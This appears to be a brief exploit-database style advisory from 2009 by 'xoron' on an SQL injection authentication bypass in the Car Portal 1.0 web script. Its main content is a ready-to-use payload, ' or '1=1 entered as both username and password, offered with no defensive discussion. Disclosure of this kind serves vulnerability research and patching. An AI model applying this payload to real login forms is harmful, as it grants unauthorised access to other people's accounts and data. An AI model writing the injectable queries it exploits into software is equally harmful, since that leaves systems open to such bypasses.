Car Portal version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
558fd8c8fa72e46873f15de1adf342ff6ea1765a365617fdd0c8a866f1a58c77
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= XORON 2009(C)
=
= Car Portal v1.0 (Bypass) Remote SQL Injection Vuln.
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script: CAR PORTAL, version 1.0
=
= Author: xoron
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Exploit:
=
= //Username: ' or '1=1
= //Password: ' or '1=1
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-